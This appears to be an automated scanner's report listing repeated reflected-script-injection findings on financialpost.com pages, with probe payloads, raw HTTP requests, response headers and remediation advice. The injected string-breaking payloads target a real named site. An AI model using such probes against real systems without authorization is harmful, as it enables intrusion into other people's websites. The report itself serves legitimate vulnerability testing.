The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c9f'%3bcdf561736ea was submitted in the REST URL parameter 1. This input was echoed as c0c9f';cdf561736ea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionc0c9f'%3bcdf561736ea/columnists/terence-corcoran.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43502
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e6c6'%3bb941a57f648 was submitted in the REST URL parameter 2. This input was echoed as 8e6c6';b941a57f648 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists8e6c6'%3bb941a57f648/terence-corcoran.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43466
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ea8'%3b6fc2681cae2 was submitted in the REST URL parameter 3. This input was echoed as 79ea8';6fc2681cae2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/79ea8'%3b6fc2681cae2 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37558
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1008f'%3b2d6e85acc6d was submitted in the REST URL parameter 1. This input was echoed as 1008f';2d6e85acc6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion1008f'%3b2d6e85acc6d/columnists/william-hanley.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43481
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8cb'%3b2ecc1657740 was submitted in the REST URL parameter 2. This input was echoed as ae8cb';2ecc1657740 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsae8cb'%3b2ecc1657740/william-hanley.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43445
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf85'%3b041ad7667b4 was submitted in the REST URL parameter 3. This input was echoed as 3cf85';041ad7667b4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/3cf85'%3b041ad7667b4 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43401
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84eb2'%3b2bb55a25061 was submitted in the REST URL parameter 1. This input was echoed as 84eb2';2bb55a25061 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance84eb2'%3b2bb55a25061/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43309
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1558b'%3bef88a93e159 was submitted in the REST URL parameter 1. This input was echoed as 1558b';ef88a93e159 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance1558b'%3bef88a93e159/Christmas+hardest+time+sell+best+time/3995600/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 80706 Expires: Sun, 19 Dec 2010 03:11:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance1558b';ef88a93e159/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance1558b';ef88a93e159;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34922104?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74102'%3b83caa696128 was submitted in the REST URL parameter 3. This input was echoed as 74102';83caa696128 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Christmas+hardest+time+sell+best+time/399560074102'%3b83caa696128/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70553 Expires: Sun, 19 Dec 2010 03:11:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/christmas-hardest-time-sell-best-time/399560074102';83caa696128/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=christmas-hardest-time-sell-best-time;kw=399560074102';83caa696128;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+su ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b22'%3b240f9e32f57 was submitted in the REST URL parameter 4. This input was echoed as a6b22';240f9e32f57 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Christmas+hardest+time+sell+best+time/3995600/a6b22'%3b240f9e32f57 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44637
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820b5'%3be19f1fa9fd was submitted in the REST URL parameter 1. This input was echoed as 820b5';e19f1fa9fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance820b5'%3be19f1fa9fd/Does+diabetes+qualify+disability+credit/3994512/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 79835 Expires: Sun, 19 Dec 2010 03:10:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance820b5';e19f1fa9fd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance820b5';e19f1fa9fd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24161567?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce248'%3bd1f8406fe84 was submitted in the REST URL parameter 3. This input was echoed as ce248';d1f8406fe84 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512ce248'%3bd1f8406fe84/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71495 Expires: Sun, 19 Dec 2010 03:11:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/does-diabetes-qualify-disability-credit/3994512ce248';d1f8406fe84/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=does-diabetes-qualify-disability-credit;kw=3994512ce248';d1f8406fe84;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa5eb'%3b0000bb3f5a6 was submitted in the REST URL parameter 4. This input was echoed as aa5eb';0000bb3f5a6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512/aa5eb'%3b0000bb3f5a6 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44637
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca37c'%3bd9a5baaf693 was submitted in the REST URL parameter 1. This input was echoed as ca37c';d9a5baaf693 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financeca37c'%3bd9a5baaf693/Elderly+brain+makes+riskier+investments/3983726/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 81437 Expires: Sun, 19 Dec 2010 03:11:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financeca37c';d9a5baaf693/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financeca37c';d9a5baaf693;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32472151?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 565bd'%3b35fb979a5ac was submitted in the REST URL parameter 3. This input was echoed as 565bd';35fb979a5ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726565bd'%3b35fb979a5ac/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64674 Expires: Sun, 19 Dec 2010 03:11:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly-brain-makes-riskier-investments/3983726565bd';35fb979a5ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly-brain-makes-riskier-investments;kw=3983726565bd';35fb979a5ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a48af'%3b7e65cea9d7b was submitted in the REST URL parameter 4. This input was echoed as a48af';7e65cea9d7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726/a48af'%3b7e65cea9d7b HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38793
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3bd2'%3b4a915ea03ce was submitted in the REST URL parameter 1. This input was echoed as a3bd2';4a915ea03ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financea3bd2'%3b4a915ea03ce/Retired+forgotten/3953088/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
